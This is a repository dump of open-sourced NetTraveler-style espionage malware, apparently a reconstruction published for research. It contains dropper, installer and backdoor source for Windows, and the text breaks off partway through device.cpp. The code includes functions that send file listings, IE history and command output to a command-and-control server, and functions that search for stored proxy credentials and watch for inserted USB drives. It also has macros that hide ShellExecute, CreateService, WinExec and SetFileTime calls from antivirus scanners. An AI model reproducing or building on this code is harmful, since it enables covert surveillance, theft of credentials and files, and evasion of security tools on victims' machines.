├── open-dropper ├── main.cpp ├── installer.hpp ├── x32_elevator.hpp ├── x64_elevator.hpp └── bypass.hpp ├── samples ├── dnlist.ini ├── enumfs.ini ├── config_t.dat └── uenumfs.ini ├── open-backdoor ├── core.hpp ├── debug.hpp ├── system_info.hpp ├── md5++.hpp ├── network_info.hpp ├── config.hpp ├── recursive.hpp ├── device.hpp ├── EnumFS.hpp ├── connection.hpp ├── setup.hpp ├── utils.hpp ├── proxy.hpp ├── md5++.cpp ├── IEHistory.hpp ├── c2.hpp ├── 3rd-party │ ├── md5.h │ ├── base64.h │ ├── base64.c │ └── md5.c ├── network_info.cpp ├── utils.cpp ├── device.cpp ├── StdAfx.hpp ├── core.cpp ├── IEHistory.cpp ├── system_info.cpp ├── EnumFS.cpp ├── recursive.cpp ├── config.cpp ├── main.cpp ├── proxy.cpp ├── connection.cpp ├── setup.cpp └── c2.cpp ├── open-installer ├── backdoor.hpp ├── bypass.hpp └── main.cpp ├── LICENSE └── open-command-and-control └── nettraveller_server.py /open-dropper/main.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/research-virus/net-traveler/HEAD/open-dropper/main.cpp -------------------------------------------------------------------------------- /samples/dnlist.ini: -------------------------------------------------------------------------------- 1 | [ScanList] 2 | ScanAll=False 3 | dircount=2 4 | d1=C:\Windows\XXXY 5 | d2=C:\Windows\XXXZ -------------------------------------------------------------------------------- /samples/enumfs.ini: -------------------------------------------------------------------------------- 1 | [Computer] 2 | Name=XXXX-PC 3 | Page=XXXX 4 | [XXXX-PC] 5 | d1=C:\Windows\XXXY 6 | d2=C:\Windows\XXXZ 7 | dircount=2 8 | [C:\Windows\XXXY\] 9 | f1=XXXXY 10 | dircount=0 11 | filecount=1 12 | [C:\Windows\XXXZ\] 13 | f1=XXXXW 14 | f2=XXXXZ 15 | dircount=0 16 | filecount=2 17 | -------------------------------------------------------------------------------- /samples/config_t.dat: -------------------------------------------------------------------------------- 1 | [Option] 2 | WebPage=http://127.0.0.1:8000/ 3 | DownCmdTime=10 4 | UploadRate=10 5 | ServiceName=TEST_TRAVNET_SVC 6 | [Other] 7 | UP=1 8 | PS=127.0.0.1 9 | PP=8080 10 | PU=TEST_USER_PROXY 11 | PW=TEST_PASS_PROXY 12 | PF=50 13 | [OtherTwo] 14 | AutoCheck=1 15 | CheckedSuccess=1 16 | -------------------------------------------------------------------------------- /open-backdoor/core.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_CORE_HPP__ 6 | #define __INC_CORE_HPP__ 7 | 8 | #include 9 | 10 | DWORD __stdcall g_fnThread1(LPVOID lpThreadParameter); 11 | 12 | void TaskReset(); 13 | 14 | #endif // __INC_CORE_HPP__ -------------------------------------------------------------------------------- /open-dropper/installer.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_INSTALLER_HPP__ 6 | #define __INC_INSTALLER_HPP__ 7 | 8 | // Installer (empty, no real data attached) 9 | static unsigned char g_lpInstaller[] = {0}; 10 | 11 | #endif // __INC_INSTALLER_HPP__ 12 | -------------------------------------------------------------------------------- /open-installer/backdoor.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_BACKDOOR_HPP__ 6 | #define __INC_BACKDOOR_HPP__ 7 | 8 | // Backdoor (empty, no real data attached) 9 | static unsigned char g_lpBackdoor[] = {0}; 10 | 11 | #endif // __INC_BACKDOOR_HPP__ 12 | -------------------------------------------------------------------------------- /open-backdoor/debug.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_DEBUG_HPP__ 6 | #define __INC_DEBUG_HPP__ 7 | 8 | #ifdef _DEBUG 9 | #define PRINTDBG(...) printf(__VA_ARGS__); 10 | #else // _DEBUG 11 | #define PRINTDBG(...) 12 | #endif // _DEBUG 13 | 14 | #endif // __INC_DEBUG_HPP__ -------------------------------------------------------------------------------- /open-dropper/x32_elevator.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_X32_ELEVATOR_HPP__ 6 | #define __INC_X32_ELEVATOR_HPP__ 7 | 8 | // x32 elevator (empty, no real data attached) 9 | static const unsigned char g_lpElevator32[] = {0}; 10 | 11 | #endif // __INC_X32_ELEVATOR_HPP__ 12 | -------------------------------------------------------------------------------- /open-dropper/x64_elevator.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_X64_ELEVATOR_HPP__ 6 | #define __INC_X64_ELEVATOR_HPP__ 7 | 8 | // x64 elevator (empty, no real data attached) 9 | static const unsigned char g_lpElevator64[] = {0}; 10 | 11 | #endif // __INC_X64_ELEVATOR_HPP__ 12 | -------------------------------------------------------------------------------- /open-backdoor/system_info.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_SYSTEM_INFO_HPP__ 6 | #define __INC_SYSTEM_INFO_HPP__ 7 | 8 | #include 9 | 10 | void GetProgramFiles(); 11 | void GetIEHistory(); 12 | void GetOSVersion(); 13 | void GetIEVersion(); 14 | 15 | #endif // __INC_SYSTEM_INFO_HPP__ -------------------------------------------------------------------------------- /open-backdoor/md5++.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_MD5_HPP__ 6 | #define __INC_MD5_HPP__ 7 | 8 | #include 9 | #include 10 | 11 | class CMD5 { 12 | public: 13 | CMD5(void) {} 14 | virtual ~CMD5(void) {} 15 | 16 | const char *GetStringMD5(const char *c_lpszString); 17 | }; 18 | 19 | #endif 20 | -------------------------------------------------------------------------------- /open-backdoor/network_info.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_NETWORK_INFO_HPP__ 6 | #define __INC_NETWORK_INFO_HPP__ 7 | 8 | #include 9 | 10 | BOOL GetVolumeSerialNumber(char *szVolSerial, DWORD dwSize); 11 | BOOL GetHostInfo(char *szHostname, DWORD dwSize, char *szHostByName); 12 | 13 | #endif // __INC_NETWORK_INFO_HPP__ -------------------------------------------------------------------------------- /open-backdoor/config.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_CONFIG_HPP__ 6 | #define __INC_CONFIG_HPP__ 7 | 8 | #include 9 | 10 | BOOL PropagateConfig(); 11 | void LoadProxyConfig(); 12 | 13 | void GetFolderRecursive(char *szFolder, int *k); 14 | void GetFolderFirstLevel(char *szFolder, int *k); 15 | 16 | #endif // __INC_CONFIG_HPP__ -------------------------------------------------------------------------------- /samples/uenumfs.ini: -------------------------------------------------------------------------------- 1 | [Computer] 2 | Name=XXXX-PC 3 | Page=XXXX 4 | [XXXX-PC] 5 | d1=E:\ 6 | dircount=1 7 | [E:\] 8 | f1=XXXA 9 | d1=XXXB 10 | d2=XXXC 11 | d3=XXXD 12 | f2=XXXE 13 | filecount=2 14 | dircount=3 15 | [E:\XXXB\] 16 | f1=YYYYA 17 | f2=YYYYB 18 | f3=YYYYC 19 | f4=YYYYD 20 | f5=YYYYE 21 | f6=YYYYF 22 | f7=YYYYG 23 | f8=YYYYH 24 | f9=YYYYI 25 | f10=YYYYJ 26 | d1=ZZZZA 27 | d2=ZZZZB 28 | d3=ZZZZC 29 | d4=ZZZZD 30 | d5=ZZZZE 31 | d6=ZZZZF 32 | filecount=10 33 | dircount=6 34 | [...TRUNCATED-FILE...] -------------------------------------------------------------------------------- /open-backdoor/recursive.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_RECURSIVE_HPP__ 6 | #define __INC_RECURSIVE_HPP__ 7 | 8 | #include 9 | #include 10 | 11 | BOOL SendUEnumFSToC2(); 12 | void RecursiveFileSearch(const char *lpszUnit, FILE *f); 13 | void ScanDevice(const char *lpszUnit); 14 | void SendTmpFolderToC2(); 15 | 16 | #endif // __INC_RECURSIVE_HPP__ -------------------------------------------------------------------------------- /open-backdoor/device.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_DEVICE_HPP__ 6 | #define __INC_DEVICE_HPP__ 7 | 8 | #include 9 | 10 | DWORD __stdcall g_fnThread2(LPVOID lpThreadParameter); 11 | 12 | LRESULT WaitForDeviceToConnect(HWND hWnd, UINT nMsg, WPARAM wParam, LPARAM lParam); 13 | BYTE ConvertUnitMaskToUnitByte(DWORD dwMask); 14 | 15 | #endif // __INC_DEVICE_HPP__ -------------------------------------------------------------------------------- /open-backdoor/EnumFS.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_ENUMFS_HPP__ 6 | #define __INC_ENUMFS_HPP__ 7 | 8 | #include 9 | #include 10 | 11 | BOOL GenerateEnumFS(); 12 | void RecursiveDriveScan(); 13 | void RecursiveFolderScan(const char *lpszRootDir, FILE *f); 14 | void LogFolderContent(const char *lpszRootDir, FILE *f); 15 | 16 | #endif // __INC_ENUMFS_HPP__ -------------------------------------------------------------------------------- /open-backdoor/connection.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_CONNECTION_HPP__ 6 | #define __INC_CONNECTION_HPP__ 7 | 8 | #include 9 | 10 | //#define TEST_CONNECTION_VERBOSE // Print output of connection test 11 | 12 | BOOL TestConnection_NoProxy(); 13 | BOOL sub_1000605B(); 14 | BOOL sub_10006637(); 15 | BOOL TestProxyConnection(); 16 | 17 | #endif // __INC_CONNECTION_HPP__ -------------------------------------------------------------------------------- /open-backdoor/setup.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_SETUP_HPP__ 6 | #define __INC_SETUP_HPP__ 7 | 8 | #include 9 | 10 | bool LoadConfig(); 11 | BOOL RemoveALL(); 12 | bool GetSystemTechnicalInfo(void); 13 | BOOL GetProcessList(); 14 | void GetNetworkInfo(); 15 | void WriteLog(LPCVOID lpBuffer, DWORD dwSize); 16 | void GetProgramFilesEx(const char *lpszProgramFiles); 17 | void Setup_(); 18 | 19 | #endif // __INC_SETUP_HPP__ -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright 2015 Christian Roggia 2 | 3 | Licensed under the Apache License, Version 2.0 (the "License"); 4 | you may not use this file except in compliance with the License. 5 | You may obtain a copy of the License at 6 | 7 | http://www.apache.org/licenses/LICENSE-2.0 8 | 9 | Unless required by applicable law or agreed to in writing, software 10 | distributed under the License is distributed on an "AS IS" BASIS, 11 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | See the License for the specific language governing permissions and 13 | limitations under the License. -------------------------------------------------------------------------------- /open-backdoor/utils.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_UTILS_HPP__ 6 | #define __INC_UTILS_HPP__ 7 | 8 | #include 9 | 10 | enum EConnMethod 11 | { 12 | NO_CONNECTION, 13 | CONNECTION_NO_PROXY, 14 | CONNECTION_METHOD2, 15 | CONNECTION_METHOD3, 16 | CONNECTION_METHOD4, 17 | }; 18 | 19 | void SetNewProxyConfig(); 20 | void SetProxyDisabled(); 21 | void SetCheckSuccess(); 22 | int RetriveInfo(); 23 | 24 | #endif // __INC_UTILS_HPP__ -------------------------------------------------------------------------------- /open-backdoor/proxy.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_PROXY_HPP__ 6 | #define __INC_PROXY_HPP__ 7 | 8 | #include 9 | #include 10 | 11 | BOOL GetProcessHandle(PHANDLE lpTokenHandle, char *lpszProcName); 12 | BOOL SearchCredentials(const char *lpszSearchTerm, char *lpszUser, char *lpszPsw); 13 | 14 | LPVOID GetURL_CustomProxy(LPCSTR lpszURL, DWORD *lpdwMemLength, LPINTERNET_PROXY_INFO lpProxy, DWORD dwProxySize, const char *lpszUser, const char *lpszPsw); 15 | LPVOID GetURL_NoProxy(LPCSTR lpszURL, DWORD *lpdwMemLength); 16 | 17 | #endif // __INC_PROXY_HPP__ -------------------------------------------------------------------------------- /open-backdoor/md5++.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "md5++.hpp" 6 | #include "StdAfx.hpp" 7 | #include "3rd-party\md5.h" 8 | 9 | const char *CMD5::GetStringMD5(const char *c_lpszString) 10 | { 11 | MD5_CTX lpCTX; 12 | char szBuf[32]; 13 | unsigned char lpMD5[16]; 14 | 15 | MD5_Init(&lpCTX); 16 | MD5_Update(&lpCTX, c_lpszString, strlen(c_lpszString)); 17 | MD5_Final(lpMD5, &lpCTX); 18 | 19 | char *c_lpszBuf = szBuf; 20 | for (int i = 0; i < 16; i++) 21 | { 22 | sprintf(c_lpszBuf, "%02x", lpMD5[i]); 23 | c_lpszBuf += 2; 24 | } 25 | 26 | memcpy(g_szLastHashMD5, szBuf, 32); 27 | return g_szLastHashMD5; 28 | } -------------------------------------------------------------------------------- /open-backdoor/IEHistory.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_IEHISTORY_HPP__ 6 | #define __INC_IEHISTORY_HPP__ 7 | 8 | #include 9 | 10 | typedef struct _HASH_RECORD_HEADER { 11 | char szSignature[4]; 12 | DWORD dwBlockCount; 13 | DWORD dwNextRecord; 14 | DWORD dwUnknown; 15 | } HASH_RECORD_HEADER; 16 | 17 | typedef struct _HASH_RECORD_BLOCK { 18 | DWORD dwUnknown; 19 | DWORD dwURLAddr; 20 | } HASH_RECORD_BLOCK; 21 | 22 | class IEHistory { 23 | private: 24 | HANDLE m_lpHistoryMapView; 25 | DWORD m_dwHistorySize; 26 | public: 27 | IEHistory(void); 28 | virtual ~IEHistory(); 29 | 30 | HANDLE Initialize(LPCSTR lpszFileName); 31 | 32 | int GetHistory(WCHAR **lpszPool); 33 | }; 34 | 35 | #endif // __INC_IEHISTORY_HPP__ -------------------------------------------------------------------------------- /open-backdoor/c2.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_C2_HPP__ 6 | #define __INC_C2_HPP__ 7 | 8 | #include 9 | 10 | enum ETask 11 | { 12 | TASK_INVALID, 13 | TASK_UNINSTALL, 14 | TASK_UPDATE, 15 | TASK_RESET, 16 | TASK_UPLOAD, 17 | }; 18 | 19 | #ifdef _DEBUG 20 | static const char sc_szTasks[5][15] = 21 | { 22 | "TASK_INVALID", 23 | "TASK_UNINSTALL", 24 | "TASK_UPDATE", 25 | "TASK_RESET", 26 | "TASK_UPLOAD" 27 | }; 28 | #endif // _DEBUG 29 | 30 | BOOL SendFileToC2(LPCSTR lpszFileToSend, const char *lpszSendName); 31 | BOOL SendFileTokenToC2(const char *lpszFileText, int nFileTextLen, const char *lpszFileName, DWORD dwFileStart, DWORD *dwRetSize); 32 | int GetTaskFromC2(); 33 | BOOL TaskUpdate(); 34 | LPVOID GetFromURL(LPCSTR szURL, DWORD *lpdwMemLength); 35 | BOOL GetCMDFromC2(); 36 | BOOL SendCMDRecvToC2(); 37 | BOOL SendEnumFSToC2(); 38 | BOOL SendDNListFilesToC2(); 39 | 40 | #endif // __INC_C2_HPP__ -------------------------------------------------------------------------------- /open-backdoor/3rd-party/md5.h: -------------------------------------------------------------------------------- 1 | /* 2 | * This is an OpenSSL-compatible implementation of the RSA Data Security, Inc. 3 | * MD5 Message-Digest Algorithm (RFC 1321). 4 | * 5 | * Homepage: 6 | * http://openwall.info/wiki/people/solar/software/public-domain-source-code/md5 7 | * 8 | * Author: 9 | * Alexander Peslyak, better known as Solar Designer 10 | * 11 | * This software was written by Alexander Peslyak in 2001. No copyright is 12 | * claimed, and the software is hereby placed in the public domain. 13 | * In case this attempt to disclaim copyright and place the software in the 14 | * public domain is deemed null and void, then the software is 15 | * Copyright (c) 2001 Alexander Peslyak and it is hereby released to the 16 | * general public under the following terms: 17 | * 18 | * Redistribution and use in source and binary forms, with or without 19 | * modification, are permitted. 20 | * 21 | * There's ABSOLUTELY NO WARRANTY, express or implied. 22 | * 23 | * See md5.c for more information. 24 | */ 25 | 26 | #ifndef _MD5_H 27 | #define _MD5_H 28 | 29 | #ifdef __cplusplus 30 | extern "C" { 31 | #endif 32 | 33 | /* Any 32-bit or wider unsigned integer data type will do */ 34 | typedef unsigned int MD5_u32plus; 35 | 36 | typedef struct { 37 | MD5_u32plus lo, hi; 38 | MD5_u32plus a, b, c, d; 39 | unsigned char buffer[64]; 40 | MD5_u32plus block[16]; 41 | } MD5_CTX; 42 | 43 | void MD5_Init(MD5_CTX *ctx); 44 | void MD5_Update(MD5_CTX *ctx, const void *data, unsigned long size); 45 | void MD5_Final(unsigned char *result, MD5_CTX *ctx); 46 | 47 | #ifdef __cplusplus 48 | } 49 | #endif 50 | 51 | #endif 52 | -------------------------------------------------------------------------------- /open-dropper/bypass.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_BYPASS_HPP__ 6 | #define __INC_BYPASS_HPP__ 7 | 8 | typedef HINSTANCE (*__tShellExecute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, INT); 9 | 10 | #ifndef UNICODE 11 | #define AV_BYPASS__ShellExecute(p) \ 12 | { \ 13 | (p)[0] = 'S'; \ 14 | (p)[1] = 'h'; \ 15 | (p)[2] = 'e'; \ 16 | (p)[3] = 'l'; \ 17 | (p)[4] = 'l'; \ 18 | (p)[5] = 'E'; \ 19 | (p)[6] = 'x'; \ 20 | (p)[7] = 'e'; \ 21 | (p)[8] = 'c'; \ 22 | (p)[9] = 'u'; \ 23 | (p)[10] = 't'; \ 24 | (p)[11] = 'e'; \ 25 | (p)[12] = 'A'; \ 26 | (p)[13] = '\0'; \ 27 | } 28 | #else // !UNICODE 29 | #define AV_BYPASS__ShellExecute(p) \ 30 | { \ 31 | (p)[0] = 'S'; \ 32 | (p)[1] = 'h'; \ 33 | (p)[2] = 'e'; \ 34 | (p)[3] = 'l'; \ 35 | (p)[4] = 'l'; \ 36 | (p)[5] = 'E'; \ 37 | (p)[6] = 'x'; \ 38 | (p)[7] = 'e'; \ 39 | (p)[8] = 'c'; \ 40 | (p)[9] = 'u'; \ 41 | (p)[10] = 't'; \ 42 | (p)[11] = 'e'; \ 43 | (p)[12] = 'W'; \ 44 | (p)[13] = '\0'; \ 45 | } 46 | #endif // !UNICODE 47 | 48 | typedef void (WINAPI *__tGetNativeSystemInfo)(LPSYSTEM_INFO); 49 | #define AV_BYPASS__GetNativeSystemInfo(p) \ 50 | { \ 51 | (p) = (__tGetNativeSystemInfo)GetProcAddress( \ 52 | GetModuleHandle("kernel32.dll"), \ 53 | "GetNativeSystemInfo" \ 54 | ); \ 55 | } 56 | 57 | typedef VOID (WINAPI *__tSleep)(DWORD); 58 | #define AV_BYPASS__Sleep(s) \ 59 | { \ 60 | __tSleep lpfnSleep = (__tSleep)GetProcAddress(LoadLibrary("kernel32.dll"), "Sleep"); \ 61 | lpfnSleep(s); \ 62 | } \ 63 | 64 | #endif // __INC_BYPASS_HPP__ -------------------------------------------------------------------------------- /open-installer/bypass.hpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #ifndef __INC_BYPASS_HPP__ 6 | #define __INC_BYPASS_HPP__ 7 | 8 | typedef BOOL (WINAPI *__tWriteFile)(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED); 9 | typedef BOOL (WINAPI *__tStartService)(SC_HANDLE, DWORD, LPCTSTR); 10 | 11 | #ifndef UNICODE 12 | #define AV_BYPASS__StartService(p) \ 13 | { \ 14 | sprintf(p, "Sta"); \ 15 | strcat(p, "rtServiceA"); \ 16 | } 17 | #else // !UNICODE 18 | #define AV_BYPASS__StartService(p) \ 19 | { \ 20 | sprintf(p, "Sta"); \ 21 | strcat(p, "rtServiceW"); \ 22 | } 23 | #endif // !UNICODE 24 | 25 | typedef SC_HANDLE (WINAPI *__tCreateService)(SC_HANDLE, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD, DWORD, LPCTSTR, LPCTSTR, LPDWORD, LPCTSTR, LPCTSTR, LPCTSTR); 26 | #ifndef UNICODE 27 | #define AV_BYPASS__CreateService(p) \ 28 | { \ 29 | (p) = (__tCreateService)GetProcAddress( \ 30 | GetModuleHandle("advapi32.dll"), \ 31 | "CreateServiceA" \ 32 | ); \ 33 | } 34 | #else // !UNICODE 35 | #define AV_BYPASS__CreateService(p) \ 36 | { \ 37 | (p) = (__tGetNativeSystemInfo)GetProcAddress( \ 38 | GetModuleHandle("advapi32.dll"), \ 39 | "CreateServiceW" \ 40 | ); \ 41 | } 42 | #endif // !UNICODE 43 | 44 | typedef UINT (WINAPI *__tWinExec)(LPCSTR, UINT); 45 | #define AV_BYPASS__WinExec(p) \ 46 | { \ 47 | (p) = (__tWinExec)GetProcAddress( \ 48 | GetModuleHandle("kernel32.dll"), \ 49 | "WinExec" \ 50 | ); \ 51 | } 52 | 53 | typedef BOOL (WINAPI *__tSetFileTime)(HANDLE, const FILETIME *, const FILETIME *, const FILETIME *); 54 | #define AV_BYPASS__SetFileTime(p) \ 55 | { \ 56 | (p) = (__tSetFileTime)GetProcAddress( \ 57 | GetModuleHandle("kernel32.dll"), \ 58 | "SetFileTime" \ 59 | ); \ 60 | } 61 | 62 | #define AV_BYPASS__WriteFile(p) \ 63 | { \ 64 | sprintf(p, "Write"); \ 65 | strcat(p, "File"); \ 66 | } 67 | 68 | #endif // __INC_BYPASS_HPP__ -------------------------------------------------------------------------------- /open-backdoor/network_info.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "network_info.hpp" 6 | 7 | #include 8 | #include 9 | #include "StdAfx.hpp" 10 | #include "debug.hpp" 11 | 12 | BOOL GetVolumeSerialNumber(char *szVolSerial, DWORD dwSize) 13 | { 14 | DWORD dwVolumeSerialNumber; 15 | 16 | if (FALSE == GetVolumeInformation(NULL, NULL, 0, &dwVolumeSerialNumber, NULL, NULL, NULL, 0)) 17 | return FALSE; 18 | 19 | memset(szVolSerial, 0, dwSize); 20 | sprintf(szVolSerial, "%08X", dwVolumeSerialNumber); 21 | 22 | char *lpszVolSerial = szVolSerial; 23 | for(char *lpszVolSerial = szVolSerial; lpszVolSerial < &szVolSerial[dwSize]; lpszVolSerial++) 24 | { 25 | if (*lpszVolSerial >= 'a' && *lpszVolSerial <= 'z') 26 | *lpszVolSerial -= 32; 27 | 28 | ++lpszVolSerial; 29 | } 30 | 31 | PRINTDBG("%s: Volume Serial - %s\n", __FUNCTION__, szVolSerial); 32 | return TRUE; 33 | } 34 | 35 | BOOL GetHostInfo(char *szHostname, DWORD dwSize, char *szHostByName) 36 | { 37 | WSAData _WSAData; 38 | 39 | memset(szHostname, 0, dwSize); 40 | 41 | if (0 != WSAStartup(0x101, &_WSAData)) 42 | { 43 | WSACleanup(); 44 | return FALSE; 45 | } 46 | 47 | if (0 != gethostname(szHostname, dwSize)) 48 | { 49 | WSACleanup(); 50 | return FALSE; 51 | } 52 | 53 | hostent *h = (hostent *)gethostbyname(szHostname); 54 | if (NULL == h) 55 | { 56 | WSACleanup(); 57 | return FALSE; 58 | } 59 | 60 | BOOL r = FALSE; 61 | for(int i = 0; ; i++) 62 | { 63 | struct in_addr *addr_list = (struct in_addr *)h->h_addr_list[i]; 64 | if (NULL == addr_list) 65 | break; 66 | 67 | sprintf(szHostByName, "%s", inet_ntoa(*addr_list)); 68 | if (strlen(szHostByName)) 69 | { 70 | r = TRUE; 71 | break; 72 | } 73 | } 74 | 75 | WSACleanup(); 76 | PRINTDBG("%s: Hostname - %s\n", __FUNCTION__, szHostname); 77 | PRINTDBG("%s: Host IP - %s\n", __FUNCTION__, szHostByName); 78 | 79 | return r; 80 | } -------------------------------------------------------------------------------- /open-backdoor/utils.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "utils.hpp" 6 | 7 | #include 8 | #include "StdAfx.hpp" 9 | #include "setup.hpp" 10 | #include "system_info.hpp" 11 | #include "connection.hpp" 12 | 13 | void SetNewProxyConfig() 14 | { 15 | CHAR szWinDir[260]; 16 | char szConfigPath[260]; 17 | 18 | GetWindowsDirectory(szWinDir, 260); 19 | sprintf(szConfigPath, "%s\\system\\config_t.dat", szWinDir); 20 | 21 | WritePrivateProfileString("Other", "UP", "1", szConfigPath); 22 | WritePrivateProfileString("Other", "PS", g_nProxy_IP__TEST, szConfigPath); 23 | WritePrivateProfileString("Other", "PP", g_nProxy_PORT__TEST, szConfigPath); 24 | WritePrivateProfileString("Other", "PU", g_nProxy_USER__TEST, szConfigPath); 25 | WritePrivateProfileString("Other", "PW", g_nProxy_PSW__TEST, szConfigPath); 26 | WritePrivateProfileString("Other", "PF", "10", szConfigPath); 27 | } 28 | 29 | void SetProxyDisabled() 30 | { 31 | char szConfigPath[260]; 32 | CHAR szWinDir[260]; 33 | 34 | GetWindowsDirectory(szWinDir, 260); 35 | sprintf(szConfigPath, "%s\\system\\config_t.dat", szWinDir); 36 | 37 | WritePrivateProfileString("Other", "UP", "0", szConfigPath); 38 | } 39 | 40 | void SetCheckSuccess() 41 | { 42 | char szConfigPath[260]; 43 | CHAR szWinDir[260]; 44 | 45 | GetWindowsDirectory(szWinDir, 260); 46 | sprintf(szConfigPath, "%s\\system\\config_t.dat", szWinDir); 47 | 48 | WritePrivateProfileString("OtherTwo", "CheckedSuccess", "1", szConfigPath); 49 | } 50 | 51 | int RetriveInfo() 52 | { 53 | Setup_(); 54 | 55 | GetProgramFiles(); 56 | GetIEHistory(); 57 | GetIEVersion(); 58 | GetOSVersion(); 59 | 60 | if (TRUE == TestConnection_NoProxy()) // Method1 61 | { 62 | SetProxyDisabled(); 63 | return CONNECTION_NO_PROXY; 64 | } 65 | 66 | if (TRUE == sub_1000605B()) // Method3 67 | { 68 | SetNewProxyConfig(); 69 | return CONNECTION_METHOD3; 70 | } 71 | 72 | if (TRUE == sub_10006637()) // Method4 73 | { 74 | SetNewProxyConfig(); 75 | return CONNECTION_METHOD4; 76 | } 77 | 78 | return NO_CONNECTION; 79 | } -------------------------------------------------------------------------------- /open-backdoor/device.cpp: -------------------------------------------------------------------------------- 1 | // Copyright 2015 Christian Roggia. All rights reserved. 2 | // Use of this source code is governed by an Apache 2.0 license that can be 3 | // found in the LICENSE file. 4 | 5 | #include "device.hpp" 6 | 7 | #include 8 | #include 9 | #include "StdAfx.hpp" 10 | #include "recursive.hpp" 11 | 12 | DWORD __stdcall g_fnThread2(LPVOID lpThreadParameter) 13 | { 14 | WNDCLASS lpWndClass; 15 | lpWndClass.style = 0; 16 | lpWndClass.lpfnWndProc = (WNDPROC)WaitForDeviceToConnect; 17 | lpWndClass.cbClsExtra = 0; 18 | lpWndClass.cbWndExtra = 0; 19 | lpWndClass.hInstance = NULL; 20 | lpWndClass.hIcon = NULL; 21 | lpWndClass.hCursor = NULL; 22 | lpWndClass.hbrBackground = 